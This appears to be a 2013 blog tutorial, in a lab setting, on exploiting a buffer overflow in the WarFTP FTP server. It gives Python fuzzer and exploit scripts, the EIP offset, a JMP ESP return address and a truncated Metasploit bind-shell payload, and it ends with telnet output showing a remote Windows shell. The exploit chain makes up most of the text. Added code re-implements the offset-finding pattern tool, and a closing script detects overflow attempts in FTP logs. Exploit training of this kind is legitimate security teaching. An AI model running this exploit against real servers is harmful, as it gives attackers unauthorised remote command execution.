Wednesday, 02 January 2013

FUZZING

Now we will try to exploit WarFTP with fuzzing. Let's go through it step by step.

First we create the fuzzer. This time we will write the fuzzer in Python (Python 2, where str is bytes, so s.send(str) works as written):

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41" * 1000                    # 1000 bytes of 'A'
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                       # read the FTP banner
print("sending evil data via USER command ...")
s.send('USER ' + buffer + '\r\n')         # the oversized USER argument
data = s.recv(1024)
s.send('PASS PASSWORD' + '\r\n')
s.close()
print("Finish")

Save it with a .py extension.

Check whether running the fuzzer makes the application crash or not.
Run WarFTP.

Then run the fuzzer in the terminal.

As a result, WarFTP disappears. That is a sign that the fuzzer managed to crash it.
The next step is to check with OllyDbg to see where in memory WarFTP crashed.
Run OllyDbg.
After WarFTP is running, run the fuzzer from BackTrack again. Here is the result

The next step is to use pattern_create. The goal is to find out the exact location of a given string within the data packet sent by the fuzzer. To do so, type the command as below

Copy and paste the output of pattern_create into the fuzzer, as in the script below

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "Aa0Aa1Aa2Aa3A . ."              # output of pattern_create, truncated here
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                       # read the FTP banner
print("sending evil data via USER command ...")
s.send('USER ' + buffer + '\r\n')
data = s.recv(1024)
s.send('PASS' + '\r\n')
s.close()
print("Finish")

Run WarFTP and OllyDbg again, then run the fuzzer again.
From the pattern_create output, EIP now holds 32714131 and ESP points at q4Aq5A ...
Next, look at which bytes of the string overwrite the registers. To do this, use pattern_offset.
Open pattern_offset and type the commands as shown below
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb q4Aq5A
493

From the data above, it can be seen that 485 bytes of data are needed to reach the EIP register, while 493 bytes are needed to reach the stack (ESP). Therefore bytes 486, 487, 488 and 489 will overwrite the EIP register.
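Why those two lookups return 485 and 493 is easier to see with the pattern algorithm in hand. The following is an added example, not code from the original post: a Python re-implementation of the cyclic pattern behind Metasploit's pattern_create / pattern_offset (uppercase, lowercase, digit triples), including the tool's rule that an 8-hex-digit needle is a little-endian register value.

```python
import string
import struct

def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1...Az9Ba0... (20280 unique bytes max)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(needle, length=20280):
    """
    Offset of `needle` in the pattern, or -1 if absent.
    Like the Ruby tool, a needle of exactly 8 hex digits (a register value copied
    from the debugger, e.g. "32714131") is taken as a 32-bit little-endian word and
    converted back into the four pattern characters it came from ("1Aq2").
    """
    if len(needle) == 8 and all(c in string.hexdigits for c in needle):
        needle = struct.pack("<I", int(needle, 16)).decode("ascii")
    return pattern_create(length).find(needle)

def eip_overwrite_bytes(eip_offset):
    """1-based positions of the four buffer bytes that land in EIP."""
    return [eip_offset + i for i in range(1, 5)]

if __name__ == "__main__":
    print(pattern_offset("32714131"))     # 485: EIP was loaded from pattern bytes 486-489
    print(pattern_offset("q4Aq5A"))       # 493: ESP points here after the crash
    print(eip_overwrite_bytes(485))       # [486, 487, 488, 489]
```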

To prove it, change the buffer variable in the fuzzer and add the EIP value to it, as in the script below

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485                       # 485 bytes of NOP padding up to EIP
buffer += "\xEF\xBE\xAD\xDE"                # bytes 486-489 land in EIP as 0xDEADBEEF (little-endian)
buffer += "\x90" * (493 - len(buffer))      # pad up to offset 493, where ESP points
buffer += "\xCC" * (1000 - len(buffer))     # INT3 marker bytes fill the rest of the 1000
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                         # read the FTP banner
print("sending evil data via USER command ...")
s.send('USER ' + buffer + '\r\n')
data = s.recv(1024)
s.send('PASS' + '\r\n')
s.close()
print("Finish")

The result is shown below

Furthermore, to find the address of a memory location that holds a JMP ESP instruction, run OllyDbg. On the View menu, select the Executable modules submenu.

Then double-click shell32.dll and search (Ctrl+F) for JMP ESP. The memory address will be displayed
7C9D30D7  FFE4 JMP ESP
7C9D30ED CC INT3

After successfully finding the address of JMP ESP in WarFTP's memory, enter the address into the fuzzer, as in the script below

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485                       # NOP padding up to EIP
buffer += "\xEB\x30\xD9\x7C"                # EIP = address of JMP ESP in shell32.dll (little-endian)
buffer += "\xCC" * (493 - len(buffer))      # pad up to offset 493, where ESP points
buffer += "\xCC" * (1000 - len(buffer))     # INT3 bytes at ESP: the debugger breaks here if JMP ESP is reached
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                         # read the FTP banner
print("sending evil data via USER command ...")
s.send('USER ' + buffer + '\r\n')
data = s.recv(1024)
s.send('PASS' + '\r\n')
s.close()
print("Finish")

Run OllyDbg and WarFTP again.

Next we create the payload. In this case we use Metasploit. Type the commands as below
root@bt:~# cd /pentest/exploits/framework2/
root@bt:/pentest/exploits/framework2# ls
data exploits msfcli msfelfscan msfpayload msfweb sdk tools
docs extras msfconsole msfencode msfpescan nops src
encoders lib msfdldebug msflogdump msfupdate payloads t
root@bt:/pentest/exploits/framework2# ./msfweb

+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

After that, open the browser and type in the IP address

Select the Payload tab and set Filter Modules = os Win32. Then select Bind Shell

The result of Generate Payload


Enter the generated payload into the fuzzer, as in the script below

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485                       # NOP padding up to EIP
buffer += "\xEB\x30\xD9\x7C"                # EIP = address of JMP ESP (little-endian)
buffer += "\x90" * 32                       # small NOP sled at ESP in front of the payload
buffer += "\x29\xc9\xb1\x51\xd9 . ."        # Bind Shell payload generated by msfweb, truncated here
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                         # read the FTP banner
print("sending evil data via USER command ...")
s.send('USER ' + buffer + '\r\n')
data = s.recv(1024)
s.send('PASS' + '\r\n')
s.close()
print("Finish")

Now run WarFTP and the fuzzer.
After that, try to telnet in by typing the following command

root@bt:~# telnet 192.168.56.101 4444
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XP SP3\My Documents>

We can see that the payload was successfully delivered in the buffer to the WarFTP server and that the Windows XP system ran the payload.
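Seen from the server side, each stage of this walkthrough leaves a distinctive trace in the FTP control channel: a 1000-byte run of one character, then a pattern_create string, then a NOP sled with a return address. The following is an added example, not part of the original post, that flags such USER commands in captured control-channel lines; the log line format, the sample lines and the 64-byte length ceiling are constructed assumptions.

```python
import re

# Constructed sample FTP control-channel lines (not from the original post):
# a normal login, the 1000-byte fuzz string, a pattern_create probe, and a
# NOP sled followed by a return address and INT3 bytes, as in this write-up.
SAMPLE_LINES = [
    "192.168.56.1 -> 192.168.56.101:21 USER anonymous",
    "192.168.56.1 -> 192.168.56.101:21 PASS guest@example.com",
    "192.168.56.1 -> 192.168.56.101:21 USER " + "A" * 1000,
    "192.168.56.1 -> 192.168.56.101:21 USER Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1",
    "192.168.56.1 -> 192.168.56.101:21 USER " + "\x90" * 40 + "\xeb\x30\xd9\x7c" + "\xcc" * 4,
]

MAX_USER_LEN = 64   # assumed ceiling; longer than any legitimate user name here

LINE_RE = re.compile(r"^(?P<src>\S+) -> (?P<dst>\S+) (?P<cmd>[A-Z]{3,4})(?: (?P<arg>.*))?$")
CYCLIC_RE = re.compile(r"(?:[A-Z][a-z][0-9]){4,}")   # pattern_create style triples

def check_line(line):
    """Return the reasons a USER command looks like an overflow attempt (empty if clean)."""
    m = LINE_RE.match(line)
    if not m or m.group("cmd") != "USER":
        return []
    arg = m.group("arg") or ""
    reasons = []
    if len(arg) > MAX_USER_LEN:
        reasons.append("oversized USER argument (%d bytes)" % len(arg))
    if len(arg) > 16 and len(set(arg)) == 1:
        reasons.append("single repeated byte: classic fuzz string")
    if CYCLIC_RE.search(arg):
        reasons.append("cyclic pattern_create sequence: offset probing")
    if any(ord(c) < 0x20 or ord(c) > 0x7e for c in arg):
        reasons.append("non-printable bytes in a text field: possible NOP sled or shellcode")
    return reasons

def scan(lines):
    """Map line index -> reasons for every suspicious line; clean lines are omitted."""
    result = {}
    for i, line in enumerate(lines):
        reasons = check_line(line)
        if reasons:
            result[i] = reasons
    return result

if __name__ == "__main__":
    for idx, reasons in sorted(scan(SAMPLE_LINES).items()):
        print("line %d: %s" % (idx, "; ".join(reasons)))
```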

GOOD LUCK FOR YOUR TRY HARDER !!!
